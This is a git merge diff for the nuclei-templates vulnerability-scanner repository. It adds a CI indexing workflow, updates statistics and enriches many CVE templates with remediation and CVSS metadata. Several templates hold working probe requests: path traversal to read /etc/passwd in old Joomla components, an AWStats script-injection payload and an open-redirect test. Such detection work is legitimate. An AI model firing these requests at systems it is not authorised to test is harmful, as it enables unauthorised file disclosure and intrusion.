Merge branch 'projectdiscovery:master' into master

.github/workflows/template-db-indexer.yml

@@ -0,0 +1,30 @@
+name: 📑 Template-DB Indexer
+
+on:
+  push:
+    tags:
+      - '*'
+  workflow_dispatch:
+
+jobs:
+  index:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/setup-go@v2
+        with:
+          go-version: 1.17
+
+      - name: Intalling Indexer
+        run: |
+          git config --global url."https://${{ secrets.ACCESS_TOKEN }}@github".insteadOf https://github
+          git clone https://github.com/projectdiscovery/nucleish-api.git
+          cd nucleish-api/cmd/generate-index/
+          go install
+
+      - name: Generate Index
+        env:
+          AWS_ACCESS_KEY: ${{ secrets.AWS_ACCESS_KEY }}
+          AWS_SECRET_KEY: ${{ secrets.AWS_SECRET_KEY }}
+        run: |
+          generate-index -mode templates
+          generate-index -mode changelog

.nuclei-ignore

@@ -7,10 +7,9 @@
 # tags is a list of tags to ignore execution for
 # unless asked for by the user.
 
-tags: 
+tags:
   - "fuzz"
   - "dos"
-  - "misc"
 
 # files is a list of files to ignore template execution
 # unless asked for by the user.

CONTRIBUTING.md

@@ -60,7 +60,7 @@ git add .
 git commit -m "Added/Fixed/Updated XXX Template"
 ```
 
-**NOTE**: 
+**NOTE**:
 
 - A Pull Request should have only one unique template to make it simple for review.
 - Multiple templates for same technology can be grouped into single Pull Request. 

README.md

@@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
 
 |    TAG    | COUNT |    AUTHOR     | COUNT |    DIRECTORY     | COUNT | SEVERITY | COUNT |  TYPE   | COUNT |
 |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
-| cve       |   955 | daffainfo     |   529 | cves             |   961 | info     |   991 | http    |  2660 |
+| cve       |   975 | daffainfo     |   529 | cves             |   981 | info     |  1015 | http    |  2716 |
-| lfi       |   400 | dhiyaneshdk   |   360 | exposed-panels   |   381 | high     |   730 | file    |    57 |
+| lfi       |   403 | dhiyaneshdk   |   369 | exposed-panels   |   398 | high     |   739 | file    |    57 |
-| panel     |   383 | pikpikcu      |   295 | vulnerabilities  |   377 | medium   |   544 | network |    48 |
+| panel     |   398 | pikpikcu      |   297 | vulnerabilities  |   380 | medium   |   558 | network |    48 |
-| xss       |   296 | pdteam        |   240 | technologies     |   214 | critical |   353 | dns     |    16 |
+| xss       |   304 | pdteam        |   246 | technologies     |   222 | critical |   361 | dns     |    16 |
-| wordpress |   277 | geeknik       |   173 | exposures        |   199 | low      |   171 |         |       |
+| wordpress |   281 | geeknik       |   174 | exposures        |   199 | low      |   172 |         |       |
-| exposure  |   273 | dwisiswant0   |   159 | workflows        |   182 |          |       |         |       |
+| exposure  |   273 | dwisiswant0   |   160 | misconfiguration |   186 |          |       |         |       |
-| rce       |   251 | gy741         |    98 | misconfiguration |   182 |          |       |         |       |
+| rce       |   256 | gy741         |   102 | workflows        |   184 |          |       |         |       |
-| tech      |   224 | pussycat0x    |    98 | token-spray      |   146 |          |       |         |       |
+| tech      |   234 | pussycat0x    |   100 | token-spray      |   146 |          |       |         |       |
-| cve2021   |   211 | 0x_akoko      |    94 | default-logins   |    67 |          |       |         |       |
+| cve2021   |   222 | 0x_akoko      |    97 | default-logins   |    71 |          |       |         |       |
-| wp-plugin |   187 | princechaddha |    81 | takeovers        |    65 |          |       |         |       |
+| wp-plugin |   191 | princechaddha |    85 | takeovers        |    65 |          |       |         |       |
 
-**203 directories, 2995 files**.
+**212 directories, 3054 files**.
 
 </td>
 </tr>

TOP-10.md

@@ -1,12 +1,12 @@
 |    TAG    | COUNT |    AUTHOR     | COUNT |    DIRECTORY     | COUNT | SEVERITY | COUNT |  TYPE   | COUNT |
 |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
-| cve       |   955 | daffainfo     |   529 | cves             |   961 | info     |   991 | http    |  2660 |
+| cve       |   975 | daffainfo     |   529 | cves             |   981 | info     |  1015 | http    |  2716 |
-| lfi       |   400 | dhiyaneshdk   |   360 | exposed-panels   |   381 | high     |   730 | file    |    57 |
+| lfi       |   403 | dhiyaneshdk   |   369 | exposed-panels   |   398 | high     |   739 | file    |    57 |
-| panel     |   383 | pikpikcu      |   295 | vulnerabilities  |   377 | medium   |   544 | network |    48 |
+| panel     |   398 | pikpikcu      |   297 | vulnerabilities  |   380 | medium   |   558 | network |    48 |
-| xss       |   296 | pdteam        |   240 | technologies     |   214 | critical |   353 | dns     |    16 |
+| xss       |   304 | pdteam        |   246 | technologies     |   222 | critical |   361 | dns     |    16 |
-| wordpress |   277 | geeknik       |   173 | exposures        |   199 | low      |   171 |         |       |
+| wordpress |   281 | geeknik       |   174 | exposures        |   199 | low      |   172 |         |       |
-| exposure  |   273 | dwisiswant0   |   159 | workflows        |   182 |          |       |         |       |
+| exposure  |   273 | dwisiswant0   |   160 | misconfiguration |   186 |          |       |         |       |
-| rce       |   251 | gy741         |    98 | misconfiguration |   182 |          |       |         |       |
+| rce       |   256 | gy741         |   102 | workflows        |   184 |          |       |         |       |
-| tech      |   224 | pussycat0x    |    98 | token-spray      |   146 |          |       |         |       |
+| tech      |   234 | pussycat0x    |   100 | token-spray      |   146 |          |       |         |       |
-| cve2021   |   211 | 0x_akoko      |    94 | default-logins   |    67 |          |       |         |       |
+| cve2021   |   222 | 0x_akoko      |    97 | default-logins   |    71 |          |       |         |       |
-| wp-plugin |   187 | princechaddha |    81 | takeovers        |    65 |          |       |         |       |
+| wp-plugin |   191 | princechaddha |    85 | takeovers        |    65 |          |       |         |       |

cnvd/2019/CNVD-2019-01348.yaml

@@ -4,9 +4,14 @@ info:
   name: Xiuno BBS CNVD-2019-01348
   author: princechaddha
   severity: medium
-  description: The Xiuno BBS system has a system reinstallation vulnerability. The vulnerability stems from the failure to protect or filter the installation directory after the system is installed. Attackers can directly reinstall the system through the installation page.
+  description: Xiuno BBS system has a system reinstallation vulnerability that could allow an attacker to directly reinstall the system through the installation page.
   reference: https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348
   tags: xiuno,cnvd,cnvd2019
+  remediation: There is currently no patch available.
+  classification:
+    cvss-metrics: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
+    cvss-score: 6.5
+    cwe-id: CWE-276
 
 requests:
   - method: GET
@@ -27,3 +32,5 @@ requests:
           - "/view/js/xiuno.js"
           - "Choose Language (选择语言)"
         condition: and
+
+# Enhanced by mp on 2022/01/26

contributors.json

@@ -643,7 +643,7 @@
         "author": "forgedhallpass",
         "links": {
             "github": "https://www.github.com/forgedhallpass",
-            "twitter": "",
+            "twitter": "https://twitter.com/forgedhallpass",
             "linkedin": "",
             "website": "",
             "email": ""

cves/2000/CVE-2000-0114.yaml

@@ -5,10 +5,13 @@ info:
   author: r3naissance
   severity: low
   description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.
+  remediation: Upgrade to the latest version.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2000-0114
     - https://www.exploit-db.com/exploits/19897
   tags: cve,cve2000,frontpage,microsoft
+  classification:
+    cve-id: CVE-2000-0114
 
 requests:
   - method: GET
@@ -24,4 +27,7 @@ requests:
       - type: word
         part: body
         words:
-          - "_vti_bin/shtml.dll"
+          - "_vti_bin/shtml.dll"
+
+
+# Enhanced by mp on 2022/01/27

cves/2001/CVE-2001-1473.yaml

@@ -6,6 +6,7 @@ info:
   severity: high
   tags: network,ssh,openssh,cves,cves2001
   description: SSHv1 is deprecated and has known cryptographic issues.
+  remediation: Upgrade to SSH 2.4 or later.
   reference:
     - https://www.kb.cert.org/vuls/id/684820
     - https://nvd.nist.gov/vuln/detail/CVE-2001-1473
@@ -24,3 +25,5 @@ network:
       - type: word
         words:
           - "SSH-1"
+
+# Updated by Chris on 2022/01/21

cves/2004/CVE-2004-0519.yaml

@@ -4,9 +4,14 @@ info:
   name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting
   author: dhiyaneshDk
   severity: medium
-  description: "Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script as other users and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php."
+  description: Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php.
-  reference: https://www.exploit-db.com/exploits/24068
+  remediation: Upgrade to the latest version.
+  reference:
+    - https://www.exploit-db.com/exploits/24068
+    - ftp://patches.sgi.com/support/free/security/advisories/20040604-01-U.asc
   tags: xss,squirrelmail,cve2004,cve
+  classification:
+    cve-id: CVE-2004-0519
 
 requests:
   - method: GET
@@ -28,3 +33,7 @@ requests:
         part: header
         words:
           - "text/html"
+
+# Enhanced by mp on 2022/01/27
+
+# Enhanced by mp on 2022/01/27

cves/2005/CVE-2005-2428.yaml

@@ -1,13 +1,19 @@
 id: CVE-2005-2428
 info:
-  name: CVE-2005-2428
+  name: Lotus Domino R5 and R6 WebMail Default Configuration Information Disclosure
   author: CasperGN
   severity: medium
-  tags: cve,cve2005
+  tags: cve,cve2005,domino
-  description: Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, stores sensitive data from names.nsf in hidden form fields, which allows remote attackers to read the HTML source to obtain sensitive information such as (1) the password hash in the HTTPPassword field, (2) the password change date in the HTTPPasswordChangeDate field, (3) the client platform in the ClntPltfrm field, (4) the client machine name in the ClntMachine field, and (5) the client Lotus Domino release in the ClntBld field, a different vulnerability than CVE-2005-2696.
+  description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696).
+  remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files.
   reference:
     - http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf
     - https://www.exploit-db.com/exploits/39495
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2005-2428
+    cwe-id: CWE-200
 
 requests:
   - method: GET
@@ -21,5 +27,7 @@ requests:
       - type: regex
         name: domino-username
         regex:
-          - '(<a href\=\"/names\.nsf/[0-9a-z\/]+\?OpenDocument)'
+          - '(<a href="/names\.nsf/[0-9a-z\/]+\?OpenDocument)'
         part: body
+
+# Enhanced by mp on 2022/02/02

cves/2008/CVE-2008-6172.yaml

@@ -4,11 +4,14 @@ info:
   name: Joomla! Component RWCards 3.0.11 - Local File Inclusion
   author: daffainfo
   severity: high
-  description: Directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
+  description: A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
+  remediation: Upgrade to the latest version.
   reference:
     - https://www.exploit-db.com/exploits/6817
     - https://www.cvedetails.com/cve/CVE-2008-6172
   tags: cve,cve2008,joomla,lfi
+  classification:
+    cve-id: CVE-2008-6172
 
 requests:
   - method: GET
@@ -25,3 +28,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/01/27

cves/2009/CVE-2009-5020.yaml

@@ -0,0 +1,26 @@
+id: CVE-2009-5020
+info:
+  name: AWStats < 6.95 - Open Redirect
+  author: pdteam
+  severity: medium
+  description: An open redirect vulnerability in awredir.pl in AWStats < 6.95 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2009-5020
+  tags: cve,cve2020,redirect,awstats
+  remediation: Apply all relevant security patches and product upgrades.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2009-5020
+    cwe-id: CWE-601
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/awstats/awredir.pl?url=example.com'
+      - '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=example.com'
+    stop-at-first-match: true
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+# Enhanced by mp on 2022/02/13

cves/2009/CVE-2009-5114.yaml

@@ -1,27 +1,26 @@
 id: CVE-2009-5114
-
 info:
   name: WebGlimpse 2.18.7 - Directory Traversal
   author: daffainfo
   severity: high
-  description: Directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
+  description: A directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
+  remediation: Apply all relevant security patches and product upgrades.
   reference:
     - https://www.exploit-db.com/exploits/36994
     - https://www.cvedetails.com/cve/CVE-2009-5114
   tags: cve,cve2009,lfi
-
+  classification:
+    cve-id: CVE-2009-5114
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd"
-
     matchers-condition: and
     matchers:
-
       - type: regex
         regex:
           - "root:.*:0:0"
-
       - type: status
         status:
           - 200
+# Enhanced by mp on 2022/02/13

cves/2010/CVE-2010-0157.yaml

@@ -1,27 +1,26 @@
 id: CVE-2010-0157
-
 info:
   name: Joomla! Component com_biblestudy - Local File Inclusion
   author: daffainfo
   severity: high
-  description: Directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php.
+  description: A directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php.
+  remediation: Upgrade to a supported version.
   reference:
     - https://www.exploit-db.com/exploits/10943
     - https://www.cvedetails.com/cve/CVE-2010-0157
   tags: cve,cve2010,joomla,lfi
-
+  classification:
+    cve-id: CVE-2010-0157
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd"
-
     matchers-condition: and
     matchers:
-
       - type: regex
         regex:
           - "root:.*:0:0"
-
       - type: status
         status:
-          - 200
+          - 200
+# Enhanced by mp on 2022/02/13

cves/2010/CVE-2010-0467.yaml

@@ -1,32 +1,29 @@
 id: CVE-2010-0467
-
 info:
   name: Joomla! Component CCNewsLetter - Local File Inclusion
   author: daffainfo
   severity: medium
-  description: Directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.
+  description: A directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.
   reference: |
     - https://www.exploit-db.com/exploits/11282
     - https://www.cvedetails.com/cve/CVE-2010-0467
   tags: cve,cve2010,joomla,lfi
+  remediation: Apply all relevant security patches and upgrades.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
     cvss-score: 5.80
     cve-id: CVE-2010-0467
     cwe-id: CWE-22
-
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00"
-
     matchers-condition: and
     matchers:
-
       - type: regex
         regex:
           - "root:.*:0:0"
-
       - type: status
         status:
-          - 200
+          - 200
+# Enhanced by mp on 2022/02/13

cves/2010/CVE-2010-0696.yaml

@@ -1,27 +1,26 @@
 id: CVE-2010-0696
-
 info:
   name: Joomla! Component Jw_allVideos - Arbitrary File Download
   author: daffainfo
   severity: high
-  description: Directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
+  description: A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
+  remediation: Upgrade to a supported version.
   reference:
     - https://www.exploit-db.com/exploits/11447
     - https://www.cvedetails.com/cve/CVE-2010-0696
   tags: cve,cve2010,joomla,lfi
-
+  classification:
+    cve-id: CVE-2010-0696
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd"
-
     matchers-condition: and
     matchers:
-
       - type: regex
         regex:
           - "root:.*:0:0"
-
       - type: status
         status:
-          - 200
+          - 200
+# Enhanced by mp on 2022/02/13

cves/2010/CVE-2010-0759.yaml

@@ -1,27 +1,26 @@
 id: CVE-2010-0759
-
 info:
   name: Joomla! Plugin Core Design Scriptegrator - Local File Inclusion
   author: daffainfo
   severity: high
-  description: Directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.
+  description: A directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.
   reference:
     - https://www.exploit-db.com/exploits/11498
     - https://www.cvedetails.com/cve/CVE-2010-0759
   tags: cve,cve2010,joomla,lfi,plugin
-
+  remediation: Upgrade to a supported version.
+  classification:
+    cve-id: CVE-2010-0759
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd"
-
     matchers-condition: and
     matchers:
-
       - type: regex
         regex:
           - "root:.*:0:0"
-
       - type: status
         status:
           - 200
+# Enhanced by mp on 2022/02/13

cves/2010/CVE-2010-0942.yaml

@@ -1,27 +1,26 @@
 id: CVE-2010-0942
-
 info:
   name: Joomla! Component com_jvideodirect - Directory Traversal
   author: daffainfo
   severity: high
   description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  remediation: Apply all relevant security patches and product upgrades.
   reference:
     - https://www.exploit-db.com/exploits/11089
     - https://www.cvedetails.com/cve/CVE-2010-0942
   tags: cve,cve2010,joomla,lfi
-
+  classification:
+    cve-id: CVE-2010-0942
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00"
-
     matchers-condition: and
     matchers:
-
       - type: regex
         regex:
           - "root:.*:0:0"
-
       - type: status
         status:
-          - 200
+          - 200
+# Enhanced by mp on 2022/02/13

cves/2010/CVE-2010-0943.yaml

@@ -1,27 +1,26 @@
 id: CVE-2010-0943
-
 info:
   name: Joomla! Component com_jashowcase - Directory Traversal
   author: daffainfo
   severity: high
-  description: Directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.
+  description: A directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.
+  remediation: Apply all relevant security patches and product upgrades.
   reference:
     - https://www.exploit-db.com/exploits/11090
     - https://www.cvedetails.com/cve/CVE-2010-0943
   tags: cve,cve2010,joomla,lfi
-
+  classification:
+    cve-id: CVE-2010-0943
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00"
-
     matchers-condition: and
     matchers:
-
       - type: regex
         regex:
           - "root:.*:0:0"
-
       - type: status
         status:
           - 200
+# Enhanced by mp on 2022/02/13

cves/2010/CVE-2010-0944.yaml

@@ -1,27 +1,26 @@
 id: CVE-2010-0944
-
 info:
   name: Joomla! Component com_jcollection - Directory Traversal
   author: daffainfo
   severity: high
-  description: Directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  description: A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  remediation: Apply all relevant security patches and product upgrades.
   reference:
     - https://www.exploit-db.com/exploits/11088
     - https://www.cvedetails.com/cve/CVE-2010-0944
   tags: cve,cve2010,joomla,lfi
-
+  classification:
+    cve-id: CVE-2010-0944
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00"
-
     matchers-condition: and
     matchers:
-
       - type: regex
         regex:
           - "root:.*:0:0"
-
       - type: status
         status:
           - 200
+# Enhanced by mp on 2022/02/13

cves/2010/CVE-2010-0972.yaml

@@ -1,27 +1,26 @@
 id: CVE-2010-0972
-
 info:
   name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion
   author: daffainfo
   severity: high
-  description: Directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+  description: A directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+  remediation: Apply all relevant security patches and product upgrades.
   reference:
     - https://www.exploit-db.com/exploits/11738
     - https://www.cvedetails.com/cve/CVE-2010-0972
   tags: cve,cve2010,joomla,lfi
-
+  classification:
+    cve-id: CVE-2010-0972
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00"
-
     matchers-condition: and
     matchers:
-
       - type: regex
         regex:
           - "root:.*:0:0"
-
       - type: status
         status:
-          - 200
+          - 200
+# Enhanced by mp on 2022/02/13

cves/2010/CVE-2010-0982.yaml

@@ -1,27 +1,26 @@
 id: CVE-2010-0982
-
 info:
   name: Joomla! Component com_cartweberp - Local File Inclusion
   author: daffainfo
   severity: high
-  description: Directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  description: A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  remediation: Apply all relevant security patches and product upgrades.
   reference:
     - https://www.exploit-db.com/exploits/10942
     - https://www.cvedetails.com/cve/CVE-2010-0982
   tags: cve,cve2010,joomla,lfi
-
+  classification:
+    cve-id: CVE-2010-0982
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd"
-
     matchers-condition: and
     matchers:
-
       - type: regex
         regex:
           - "root:.*:0:0"
-
       - type: status
         status:
-          - 200
+          - 200
+# Enhanced by mp on 2022/02/13

cves/2010/CVE-2010-0985.yaml

@@ -1,27 +1,26 @@
 id: CVE-2010-0985
-
 info:
   name: Joomla! Component com_abbrev - Local File Inclusion
   author: daffainfo
   severity: high
-  description: Directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+  description: A directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+  remediation: Apply all relevant security patches and product upgrades.
   reference:
     - https://www.exploit-db.com/exploits/10948
     - https://www.cvedetails.com/cve/CVE-2010-0985
   tags: cve,cve2010,joomla,lfi
-
+  classification:
+    cve-id: CVE-2010-0985
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00"
-
     matchers-condition: and
     matchers:
-
       - type: regex
         regex:
           - "root:.*:0:0"
-
       - type: status
         status:
           - 200
+# Enhanced by mp on 2022/02/13

cves/2010/CVE-2010-1056.yaml

@@ -1,27 +1,26 @@
 id: CVE-2010-1056
-
 info:
   name: Joomla! Component com_rokdownloads - Local File Inclusion
   author: daffainfo
   severity: high
-  description: Directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+  description: A directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+  remediation: Apply all relevant security patches and product upgrades.
   reference:
     - https://www.exploit-db.com/exploits/11760
     - https://www.cvedetails.com/cve/CVE-2010-1056
   tags: cve,cve2010,joomla,lfi
-
+  classification:
+    cve-id: CVE-2010-1056
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00"
-
     matchers-condition: and
     matchers:
-
       - type: regex
         regex:
           - "root:.*:0:0"
-
       - type: status
         status:
-          - 200
+          - 200
+# Enhanced by mp on 2022/02/13

cves/2010/CVE-2010-1081.yaml

@@ -1,27 +1,26 @@
 id: CVE-2010-1081
-
 info:
   name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion
   author: daffainfo
   severity: high
-  description: Directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  description: A directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  remediation: Apply all relevant security patches and product upgrades.
   reference:
     - https://www.exploit-db.com/exploits/11511
     - https://www.cvedetails.com/cve/CVE-2010-1081
   tags: cve,cve2010,joomla,lfi
-
+  classification:
+    cve-id: CVE-2010-1081
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"
-
     matchers-condition: and
     matchers:
-
       - type: regex
         regex:
           - "root:.*:0:0"
-
       - type: status
         status:
-          - 200
+          - 200
+# Enhanced by mp on 2022/02/13

cves/2010/CVE-2010-1217.yaml

@@ -1,27 +1,26 @@
 id: CVE-2010-1217
-
 info:
   name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion
   author: daffainfo
   severity: high
-  description: Directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.
+  description: A directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE -- the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.
+  remediation: Apply all relevant security patches and product upgrades.
   reference:
     - https://www.exploit-db.com/exploits/11814
     - https://www.cvedetails.com/cve/CVE-2010-1217
   tags: cve,cve2010,joomla,lfi,plugin
-
+  classification:
+    cve-id: CVE-2010-1217
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00"
-
     matchers-condition: and
     matchers:
-
       - type: regex
         regex:
           - "root:.*:0:0"
-
       - type: status
         status:
           - 200
+# Enhanced by mp on 2022/02/13

cves/2012/CVE-2012-4547.yaml

@@ -0,0 +1,34 @@
+id: CVE-2012-4547
+
+info:
+  name: AWStats 6.95/7.0 - 'awredir.pl' Cross-Site Scripting
+  author: dhiyaneshDk
+  severity: medium
+  description: AWStats is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
+  reference:
+    - https://www.exploit-db.com/exploits/36164
+    - https://nvd.nist.gov/vuln/detail/CVE-2012-4547
+  tags: cve,cve2020,xss,awstats
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E'
+      - '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E'
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<script>alert(document.domain)</script>"
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200

cves/2013/CVE-2013-7091.yaml

@@ -0,0 +1,36 @@
+id: CVE-2013-7091
+
+info:
+  name: Zimbra Collaboration Server 7.2.2/8.0.2 LFI
+  author: rubina119
+  severity: critical
